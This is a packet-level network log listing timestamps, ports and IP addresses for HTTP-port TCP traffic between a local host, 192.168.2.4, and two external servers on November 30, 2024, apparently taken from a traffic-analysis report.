Nov 30, 2024 04:06:54.440045118 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.440268993 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.440412045 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.441394091 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.441466093 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.442492962 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.442610979 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.443631887 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.443754911 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.444720984 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.444839001 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.445255995 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.445832968 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.445871115 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.445949078 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.446965933 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.447011948 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.447047949 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.448077917 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.448120117 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.448204041 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.449187994 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.449230909 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.449295998 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.450304985 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.450356007 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.450390100 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.451401949 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.451463938 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.451502085 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.452508926 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.452573061 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.452653885 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.453613997 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.453663111 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.453717947 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.454751968 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.454801083 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.454838037 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.455848932 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.455910921 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.455948114 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.456942081 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.456986904 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.457042933 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.457720995 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.457773924 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.457777023 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.457813025 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.458070993 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.458125114 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.458154917 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.458287954 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.458297968 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.458336115 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.459177971 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.459223032 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.459346056 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.459357023 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.459400892 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.459425926 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.459471941 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.460285902 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.460329056 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.460407972 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.460485935 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.460500956 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.460525036 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.460551023 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.461400032 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.461451054 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.461489916 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.461500883 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.461544037 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.461589098 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.461637020 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.462501049 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.462548971 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.462579966 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.462590933 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.462630987 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.462692976 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.462739944 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.463625908 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.463670015 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.463670969 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.463681936 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.463783979 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.463798046 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.463944912 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.464716911 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.464782000 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.464793921 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.464896917 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.465033054 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.465034962 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.465841055 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.465878963 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.465884924 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.465892076 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.465924025 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.466013908 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.466051102 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.466928005 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.466969967 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.466994047 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.467004061 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.467041969 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.467044115 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.467119932 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.468028069 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.468085051 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.468086004 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.468095064 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.468163013 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.468163967 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.468204021 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.469094038 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.469137907 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.469150066 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.469162941 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.469199896 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.469201088 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.469264984 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.470180988 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.470227003 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.470253944 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.470268011 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.470308065 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.470309019 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.470361948 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.471286058 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.471394062 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.471406937 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.471415997 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.471446037 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.471446037 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.471462965 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.472378969 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.472430944 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.472466946 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.472523928 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.472534895 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.472630978 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.472631931 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.473440886 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.473490953 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.473567009 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.473608971 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.473634958 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.473645926 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.473683119 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.474528074 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.474597931 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.474632025 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.474723101 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.474733114 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.474801064 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.474802971 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.475631952 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.475744963 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.475832939 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.475843906 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.475876093 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.476018906 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.476047993 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.476701975 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.476814032 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.476916075 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.477026939 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.477792978 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.477794886 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.477818012 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.477868080 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.477936983 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.477982044 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.478041887 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.478051901 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.478089094 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.478883028 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.478986979 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.479087114 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.479118109 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.479211092 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.479238987 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.479986906 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.480034113 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.480093956 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.480144978 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.480253935 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.480298042 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.480377913 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.481065035 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.481115103 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.481163979 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.481262922 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.481359005 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.481401920 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.481477976 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.482166052 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.482213974 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.482268095 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.482325077 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.482458115 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.482501984 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.482549906 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.483223915 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.483269930 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.483339071 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.483385086 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.484316111 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.484366894 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.484426975 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.484471083 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.485409975 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.485461950 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.485503912 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.485552073 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.486504078 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.486550093 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.486603022 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.486676931 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.487591028 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.487639904 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.487710953 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.487760067 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.488678932 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.488782883 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.489753962 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.489864111 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.490928888 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.491123915 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.491277933 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.491519928 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.491940022 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.491990089 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.492058992 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.492105007 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.493026972 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.493073940 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.493135929 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.493180990 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.494093895 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.494143009 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.494149923 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.494271994 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.495196104 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.495302916 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.495435953 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.496293068 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.496340036 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.496411085 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.496455908 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.497353077 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.497397900 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.497483015 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.497528076 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.498450994 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.498501062 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.498570919 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.498629093 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.499552011 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.499602079 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.499676943 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.499727011 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.500629902 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.500678062 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.500731945 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.500778913 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.501727104 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.501774073 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.501841068 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.501899004 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.502791882 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.502836943 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.502911091 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.502971888 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.503885984 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.503935099 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.503993034 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.504039049 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.504971981 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.505016088 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.505085945 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.505129099 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.506073952 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.506234884 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.506236076 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.506416082 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.507147074 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.507194996 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.507236004 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.507280111 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.508240938 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.508286953 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.508352041 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.508404016 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.509325027 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.509426117 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.509453058 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.509628057 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.510418892 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.510531902 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.511497974 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.511599064 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.512586117 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.512690067 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.512860060 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.513663054 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.513715982 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.513775110 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.513822079 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.514724970 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:54.514786005 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:54.524641991 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.603867054 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.603981972 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.604027033 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.604414940 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.604530096 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.604836941 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.605511904 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.605629921 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.605693102 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.606617928 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.629822969 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.629924059 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.629950047 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.630343914 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.630428076 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.631172895 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.631442070 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.631481886 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.631555080 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.632553101 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.632595062 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:54.632690907 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.633666039 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.633764982 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:54.633943081 CET	49894	80	192.168.2.4	185.215.113.16
